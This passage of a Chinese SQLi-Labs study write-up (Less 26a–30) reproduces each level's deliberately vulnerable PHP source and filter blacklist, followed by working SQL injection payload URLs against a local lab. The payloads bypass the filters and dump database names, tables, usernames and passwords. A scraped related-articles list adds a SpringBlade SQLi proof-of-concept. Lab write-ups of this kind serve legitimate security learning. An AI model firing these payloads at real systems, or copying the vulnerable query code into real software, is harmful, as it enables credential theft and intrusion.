    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.   
    33. // connectivity   
    34.     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  
    35.     $result=mysql_query($sql);  
    36.     $row = mysql_fetch_array($result);  
    37.     if($row)  
    38.     {  
    39.         echo "";    
    40.         echo 'Your Login name:'. $row['username'];  
    41.         echo "
      ";  
    42.         echo 'Your Password:' .$row['password'];  
    43.         echo "";  
    44.     }  
    45.     else   
    46.     {  
    47.         echo '';  
    48.         //print_r(mysql_error());  
    49.         echo "";    
    50.     }  
    51. }  
    52.     else { echo "Please input the ID as parameter with numeric value";}  
    53.   
    54.   
    55.   
    56.   
    57. function blacklist($id)  
    58. {  
    59.     $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)  
    60.     $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)  
    61.     $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  
    62.     $id= preg_replace('/[--]/',"", $id);        //Strip out --  
    63.     $id= preg_replace('/[#]/',"", $id);         //Strip out #  
    64.     $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  
    65.     $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  
    66.     $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes  
    67.     return $id;  
    68. }  
    69.   
    70.   
    71.   
    72. ?>  
    73.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   

    • 这关与26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所有我们排除报错注入,这里依旧是利用union注入,构造payload:

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-26a/?id=-1')union%a0select%a01,2,3||('1  

    同时该例可以利用延时注入。前面已经有介绍了,自行构造即可。


    Less-27 过滤了union和select的


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第24张图片


    ②查看源代码:

    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-27 Trick with SELECT & UNION  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.   
    33. // connectivity   
    34.     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
    35.     $result=mysql_query($sql);  
    36.     $row = mysql_fetch_array($result);  
    37.     if($row)  
    38.     {  
    39.         echo "";    
    40.         echo 'Your Login name:'. $row['username'];  
    41.         echo "
      ";  
    42.         echo 'Your Password:' .$row['password'];  
    43.         echo "";  
    44.     }  
    45.     else   
    46.     {  
    47.         echo '';  
    48.         print_r(mysql_error());  
    49.         echo "";    
    50.     }  
    51. }  
    52.     else { echo "Please input the ID as parameter with numeric value";}  
    53.   
    54.   
    55.   
    56.   
    57. function blacklist($id)  
    58. {  
    59. $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  
    60. $id= preg_replace('/[--]/',"", $id);        //Strip out --.  
    61. $id= preg_replace('/[#]/',"", $id);         //Strip out #.  
    62. $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.  
    63. $id= preg_replace('/select/m',"", $id);     //Strip out spaces.  
    64. $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.  
    65. $id= preg_replace('/union/s',"", $id);      //Strip out union  
    66. $id= preg_replace('/select/s',"", $id);     //Strip out select  
    67. $id= preg_replace('/UNION/s',"", $id);      //Strip out UNION  
    68. $id= preg_replace('/SELECT/s',"", $id);     //Strip out SELECT  
    69. $id= preg_replace('/Union/s',"", $id);      //Strip out Union  
    70. $id= preg_replace('/Select/s',"", $id);     //Strip out select  
    71. return $id;  
    72. }  
    73.   
    74.   
    75.   
    76. ?>  
    77.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   


    • 本关主要考察将union,select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的,只需要将union和select改为大小写混合就可以突破。
    首先判断为单引号型:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs/Less-27/?id=1'  
    直接上payload,获取数据库:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-27/?id=100%27%09UnIon%09SeLect%091,database(),3||%271  

    SQLi-Labs 学习笔记(Less 21-30)_第25张图片

    获取表:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-27/?id=%27%09uNion%09sElect%091,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27%09uNion%09sElect%091,2,%273  
    SQLi-Labs 学习笔记(Less 21-30)_第26张图片

    获取用户信息:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-27/?id=%27%09uNion%09sElect%091,(group_concat(username)),(group_concat(password))%09from%09users%09uNion%09sElect%091,2,%273  
    SQLi-Labs 学习笔记(Less 21-30)_第27张图片


    Less-27a Less27的盲注版本


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第28张图片

    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-27 Trick with SELECT & UNION  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.     $id = '"' .$id. '"';  
    33.   
    34. // connectivity   
    35.     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  
    36.     $result=mysql_query($sql);  
    37.     $row = mysql_fetch_array($result);  
    38.     if($row)  
    39.     {  
    40.         echo "";    
    41.         echo 'Your Login name:'. $row['username'];  
    42.         echo "
      ";  
    43.         echo 'Your Password:' .$row['password'];  
    44.         echo "";  
    45.     }  
    46.     else   
    47.     {  
    48.         echo '';  
    49.         //print_r(mysql_error());  
    50.         echo "";    
    51.     }  
    52. }  
    53.     else { echo "Please input the ID as parameter with numeric value";}  
    54.   
    55.   
    56.   
    57.   
    58. function blacklist($id)  
    59. {  
    60. $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  
    61. $id= preg_replace('/[--]/',"", $id);        //Strip out --.  
    62. $id= preg_replace('/[#]/',"", $id);         //Strip out #.  
    63. $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.  
    64. $id= preg_replace('/select/m',"", $id);     //Strip out spaces.  
    65. $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.  
    66. $id= preg_replace('/union/s',"", $id);      //Strip out union  
    67. $id= preg_replace('/select/s',"", $id);     //Strip out select  
    68. $id= preg_replace('/UNION/s',"", $id);      //Strip out UNION  
    69. $id= preg_replace('/SELECT/s',"", $id);     //Strip out SELECT  
    70. $id= preg_replace('/Union/s',"", $id);      //Strip out Union  
    71. $id= preg_replace('/Select/s',"", $id);     //Strip out Select  
    72. return $id;  
    73. }  
    74.   
    75.   
    76.   
    77. ?>  
    78.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   


    • 本关与27关的区别在于对于id的处理,这里用的是 " ,同时mysql的错误不会在前端页面显示,可以用延时注入或者union注入,union注入只要把27给出的payload里的单引号改成双引号就行了,     我们直接给出一个示例payload(延时):
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-27a/?id=1"and(length(database())>7)%09uNion%09sElect%091,2,"3  
    SQLi-Labs 学习笔记(Less 21-30)_第29张图片


    Less-28 基于错误的,有括号的单引号字符型,过滤了union和select等的注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第30张图片

    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-28 Trick with SELECT & UNION  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.   
    33. // connectivity   
    34.     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  
    35.     $result=mysql_query($sql);  
    36.     $row = mysql_fetch_array($result);  
    37.     if($row)  
    38.     {  
    39.         echo "";    
    40.         echo 'Your Login name:'. $row['username'];  
    41.         echo "
      ";  
    42.         echo 'Your Password:' .$row['password'];  
    43.         echo "";  
    44.     }  
    45.     else   
    46.     {  
    47.         echo '';  
    48.         //print_r(mysql_error());  
    49.         echo "";    
    50.     }  
    51. }  
    52.     else { echo "Please input the ID as parameter with numeric value";}  
    53.   
    54.   
    55.   
    56.   
    57. function blacklist($id)  
    58. {  
    59. $id= preg_replace('/[\/\*]/',"", $id);              //strip out /*  
    60. $id= preg_replace('/[--]/',"", $id);                //Strip out --.  
    61. $id= preg_replace('/[#]/',"", $id);                 //Strip out #.  
    62. $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.  
    63. //$id= preg_replace('/select/m',"", $id);               //Strip out spaces.  
    64. $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.  
    65. $id= preg_replace('/union\s+select/i',"", $id);     //Strip out UNION & SELECT.  
    66. return $id;  
    67. }  
    68.   
    69.   
    70.   
    71. ?>  
    72.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   

    • 重要的区别在这句代码:
    [plain]  view plain  copy
    1. $id= preg_replace('/union\s+select/i',"", $id);  

    那个i表示匹配的模式,i是忽略大小写,\s就是匹配任意空白字符,制表符啊,换行啊空格啊等,那我们中间不加空格能绕过吧。

    直接给出payload:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-28/?id=100')union%09select(1),(user()),(3)||('1  


    Less-28a 基于盲注的,有括号的单引号字符型,过滤了union和select等的注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第31张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-28a Trick with SELECT & UNION  
    6.   
    7.   
    8.   
    9. Welcome    Dhakkan 
        
    10.   
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16.   
    17. // take the variables   
    18. if(isset($_GET['id']))  
    19. {  
    20.     $id=$_GET['id'];  
    21.     //logging the connection parameters to a file for analysis.  
    22.     $fp=fopen('result.txt','a');  
    23.     fwrite($fp,'ID:'.$id."\n");  
    24.     fclose($fp);  
    25.   
    26.     //fiddling with comments  
    27.     $id= blacklist($id);  
    28.     //echo "
      ";  
    29.     //echo $id;  
    30.     //echo "
      ";  
    31.     $hint=$id;  
    32.   
    33. // connectivity   
    34.     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  
    35.     $result=mysql_query($sql);  
    36.     $row = mysql_fetch_array($result);  
    37.     if($row)  
    38.     {  
    39.         echo "";    
    40.         echo 'Your Login name:'. $row['username'];  
    41.         echo "
      ";  
    42.         echo 'Your Password:' .$row['password'];  
    43.         echo "";  
    44.     }  
    45.     else   
    46.     {  
    47.         echo '';  
    48.         //print_r(mysql_error());  
    49.         echo "";    
    50.     }  
    51. }  
    52.     else { echo "Please input the ID as parameter with numeric value";}  
    53.   
    54.   
    55.   
    56.   
    57. function blacklist($id)  
    58. {  
    59. //$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*  
    60. //$id= preg_replace('/[--]/',"", $id);              //Strip out --.  
    61. //$id= preg_replace('/[#]/',"", $id);                   //Strip out #.  
    62. //$id= preg_replace('/[ +]/',"", $id);              //Strip out spaces.  
    63. //$id= preg_replace('/select/m',"", $id);               //Strip out spaces.  
    64. //$id= preg_replace('/[ +]/',"", $id);              //Strip out spaces.  
    65. $id= preg_replace('/union\s+select/i',"", $id);     //Strip out spaces.  
    66. return $id;  
    67. }  
    68.   
    69.   
    70.   
    71. ?>  
    72.  



      
  •   

  •   

  •   

  •   
  •   

  •   

  •   
  •   
  • echo "Hint: Your Input is Filtered with following result: ".$hint;  
  • ?>  
  •    
    •   
  •   
  •   

    •
    本关与28基本一致,只是过滤条件少了几个,直接给出payload:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-28a/?id=1')and(length(database())>7)%09uNion%09sElect%091,2,('3  
    关于 29,30,31 这三关的基本情况:请参考此链接:http://www.cnblogs.com/lcamry/p/5762961.html


    [*] Less-29 基于WAF的一个错误


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第32张图片


    ②首先先看下tomcat中的index.jsp文件

    SQLi-Labs 学习笔记(Less 21-30)_第33张图片


    在apache的index.php中,sql语句为:

    [plain]  view plain  copy
    1. sql="SELECT ∗ FROM users WHERE id='id' LIMIT 0,1";  
    我们根据HPP的原理,我们直接payload:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-29/index.jsp?id=1&id=-2' union select 1,database(),3 or '1'='1  

    SQLi-Labs 学习笔记(Less 21-30)_第34张图片


    Less-30 基于错误的POST型单引号字符型注入


    先打开网页查看 Welcome Dhakkan

    SQLi-Labs 学习笔记(Less 21-30)_第35张图片


    于之前的区别不过是在这个位置:

    [plain]  view plain  copy
    1. $id = '"' .$id. '"';  
    2. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  


    不用说都知道怎么改了吧。


    你可能感兴趣的:(SQL注入)

    • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
      SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
    • Web安全:Web体系架构存在的安全问题和解决方室 程序员-张师傅 前端安全web安全前端
      Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析:Web体系架构存在的安全问题注入攻击SQL注入:攻击者通过在输入字段中插入恶意SQL代码,操控后台数据库,窃取、篡改或删除数据。OS命令注入:攻击者通过输入字段插入恶意代码,执行系统
    • 2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
      本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2
    • 最新网络安全(黑客)——自学篇 黑客小雨 web安全安全
      *需要的小伙伴关注我第一阶段:基础操作入门,学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍,一般来说这个过程在1个月左右比较合适。在这个阶段,你已经对网络安全有了基本的了解。如果你学完了第一步,相信你已经在理论上明白了上面是sql注入,什么是xss攻击,对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基!所谓的“打地基”其实就是系统化的
    • Spring Interceptor Draper
      Spring中使用Interceptor拦截器与Servlet的listener比较相似,同样是监听请求,同样需要配置,一个是在web.xml中,Spring拦截器是在Spring配置文件中拦截未登录用户访问某些连接拦截日志信息拦截SQL注入执行顺序是preHandle->controller->postHandle->afterCompletionSpringInterceptor属于链式调用,
    • HP 应用程序如何防止 SQL 注入攻击提高程序安全稳定性? xiaohuojian1 android
      在PHP应用程序中,防止SQL注入攻击是确保程序安全和稳定的关键步骤。SQL注入攻击可以让恶意用户通过操控SQL查询来访问、修改或删除数据库中的数据,严重时甚至可能导致系统的完全控制。以下是防止SQL注入攻击的有效策略和最佳实践,以帮助提高PHP应用程序的安全性和稳定性。一、使用预处理语句和参数化查询1.预处理语句https://github.com/xhj2/p/issues/7预处理语句是防止
    • Web应用防火墙 Smile灬凉城666 网络安全WAF安全
      一、定义与目的WAF是一种特殊类型的防火墙,专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS(跨站脚本)、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层,即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说,WAF会解析进入Web应用的HTTP/HTTPS请求
    • Web安全与网络安全:SQL漏洞注入 hong161688 web安全sqloracle
      Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    • Web安全与网络安全:SQL漏洞注入 bigbig猩猩 typescriptvue.js前端
      Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    • Web安全之SQL注入:如何预防及解决 J老熊 JavaWeb安全web安全sql数据库系统架构面试
      SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
    • Java Web安全与Spring Config对象实战 福建低调
      本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全
    • XSS和sql注入部分场景测试用例样例 谷隐凡二 测试xsssql测试用例
      目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息,不应允许
    • Java代码审计篇:SQL注入 zkzq 数据库
      一、常见SQL注入1、sql语句动态拼接示例代码:Stringid=request.getParameter("id");res=st.executeQuery("SELECT*FROM\"IWEBSEC\".\"user\"WHERE\"id\"="+id);while(res.next()){intp=res.getInt("id");Stringn=res.getString("userna
    • Mybatis 防止sql注入 Ferrari1001
      SQL****注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的****SQL****语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者)。[摘自]SQLinjection-WikipediaSQL****注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以
    • sql注入常用函数 web安全工具库 小课堂sql注入常用函数
      当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。----网易云热评一、MySql注入常用函数1、system_user()系统用户名2、user()用户名3、current_user()当前用户名4、session_user()链接数据库的用户名5、database()数据库名6、version()数据库版本7、@@datadir数据库路径8、@@basedir数据
    • python自动化笔记:操作mysql数据库 zhoukeguai python自动化笔记数据库python自动化
      操作mysql数据库常见方法1、第三方库:pymysql1.1、安装pymysql1.2、连接数据库1.3、连接指定数据库1.4创建数据库、创建表1.5、表中插入数据1.6、批量插入数据1.7、获取查询结果数据1.8、防sql注入,sql语句中一般用占位符传值2、标准库:mysql.connector2.1、安装mysql-connector2.2、操作方法1、第三方库:pymysql1.1、安装
    • Node.js 入门:中间件与安全性深度解析 Switch616 前端node.js中间件chrome服务器架构前端前端框架
      Node.js入门:中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录:认证流程与实践️权限管理:安全访问控制详解️安全性防止SQL注入:参数化查询与ORM的最佳实践防止XSS攻击:用户输入处理与安全防护使用HTTPS和SSL/TLS:加密传输与数据安全⚠️错误处理️全局错误处理:确保应用稳定性的关键异常捕获与日志记录:有效排查问题的核心认证与授权使用
    • SQL注入漏洞检测 Kali与编程~ sql网络安全
      预计更新SQL注入概述1.1SQL注入攻击概述1.2SQL注入漏洞分类1.3SQL注入攻击的危害SQLMap介绍2.1SQLMap简介2.2SQLMap安装与配置2.3SQLMap基本用法SQLMap进阶使用3.1SQLMap高级用法3.2SQLMap配置文件详解3.3SQLMap插件的使用SQL注入漏洞检测4.1SQL注入漏洞检测基础4.2SQL注入漏洞检测工具4.3SQL注入漏洞检测实战SQL
    • sql注入漏洞 mineflame_ sql
      所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入
    • Oracle(107)什么是数据库防火墙(Database Firewall)? 辞暮尔尔-烟火年年 Oracle数据库oracle
      数据库防火墙(DatabaseFirewall)是一种安全技术,用于监控和控制对数据库的访问,以防止未经授权的访问、SQL注入攻击和其他恶意活动。数据库防火墙可以实时分析和过滤SQL查询,确保只有合法的、预期的查询能够到达数据库,从而保护数据库的完整性和安全性。数据库防火墙的主要功能SQL语句分析和过滤:实时分析传入的SQL语句,阻止恶意或未经授权的SQL语句。行为基准:建立正常SQL语句的基准,
    • java sql注入正则表达式_Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法... 用看智障的眼神看 javasql注入正则表达式
      我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法。怎么来解决和防范sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的防止办法。其实对于其他的,思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入:1、普通用户与系统管理员用户的权限要有严格的区分。如果一个普通用户在使用查询语句中嵌入另一个DropT
    • php操作mysql防止sql注入(合集) get200 mysqlmysql注入
      本文将从sql注入风险说起,并且比较addslashes、mysql_escape_string、mysql_real_escape_string、mysqli和pdo的预处理的区别。当一个变量从表单传入到php,需要查询mysql的话,需要进行处理。举例:$unsafe_variable=$_POST[‘user_input’];mysqli_query(“INSERTINTOtable(col
    • 基于流谱理论的SSL/TLS协议攻击检测方法 米朵儿技术屋 大数据与数字化的设计应用专栏ssl网络协议网络
      摘要网络攻击检测在网络安全中扮演着重要角色。网络攻击检测的对象主要为僵尸网络、SQL注入等攻击行为。随着安全套接层/安全传输层(SSL/TLS)加密协议的广泛使用,针对SSL/TLS协议本身发起的SSL/TLS攻击日益增多,因此通过搭建网络流采集环境,构建了包含4种SSL/TLS攻击网络流与正常网络流的网络流数据集。针对当前网络攻击流检测的可观测性有限、网络流原始时空域分离性有限等问题,提出流谱理
    • 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了 webfker from 0 to 1 githubgitjava
      目录面经牛客奇安信面经(五星推荐)牛客面经(推荐)渗透测试面经(推荐)渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
    • javaWeb安全漏洞修复总结 dechen6073 java数据库web安全
      1Web安全介绍12SQL注入、盲注12.1SQL注入、盲注概述12.2安全风险及原因22.3AppScan扫描建议22.4应用程序解决方案43会话标识未更新73.1会话标识未更新概述73.2安全风险及原因分析73.3AppScan扫描建议83.4应用程序解决方案84已解密登录请求84.1已解密登录请求概述84.2安全风险及原因分析84.3AppScan扫描建议94.4应用程序解决方案95跨站点请
    • Web攻击-XSS、CSRF、SQL注入 rrrobber 前端xsscsrf
      1.XSS攻击:跨站脚本攻击XSS(CrossSiteScripting),跨站脚本攻击,允许攻击者将恶意代码植入到提供给其它用户使用的页面中。XSS的攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息。一旦获取到合法用户的信息后,攻击者甚至可以假冒合法用户与网站进行交互。根据攻击来源被分为存储型、反射型、DOM型1.1.存储型存储型XSS的攻击步骤:攻击者将恶意
    • 【网络安全】SQL注入详解 白袍无涯 sqlweb安全数据库网络安全系统安全
      一、什么是sql注入SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1:寻找到SQL注入的位置2:判断服务器类型和后台数据库类型3:针对不同的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例Stringsql="select*fromuser_tablew
    • ctfshow-web入门-sql注入-web172 HkD01L ctfshowSQL注入sql数据库
      题目描述查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user2whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif($row->
    • 用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现 天官赐福万无禁忌 漏洞复现安全web安全
      1产品简介用友U8Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。2漏洞概述用友U8CloudRepAddToTaskAction接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。3影响范围
    • SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范 白袍无涯 sql安全web安全网络安全计算机网络安全架构系统安全
      在SQL注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON注入以及头部XFF注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种SQL注入攻击方式的原理和特点。一、堆查询注入1.原理堆查询注入是一种利用数据库中可以同时执行多个查询的特性进行攻击的方法。在某些数据库系统中,可以通过分号将多个查询语句连接起来执行。攻击者利用这个特
    • Spring4.1新特性——综述 jinnianshilongnian spring 4.1
      目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
    • Schema与数据类型优化 annan211 数据结构mysql
      目前商城的数据库设计真是一塌糊涂,表堆叠让人不忍直视,无脑的架构师,说了也不听。 在数据库设计之初,就应该仔细揣摩可能会有哪些查询,有没有更复杂的查询,而不是仅仅突出 很表面的业务需求,这样做会让你的数据库性能成倍提高,当然,丑陋的架构师是不会这样去考虑问题的。 选择优化的数据类型 1 更小的通常更好 更小的数据类型通常更快,因为他们占用更少的磁盘、内存和cpu缓存,
    • 第一节 HTML概要学习 chenke htmlWebcss
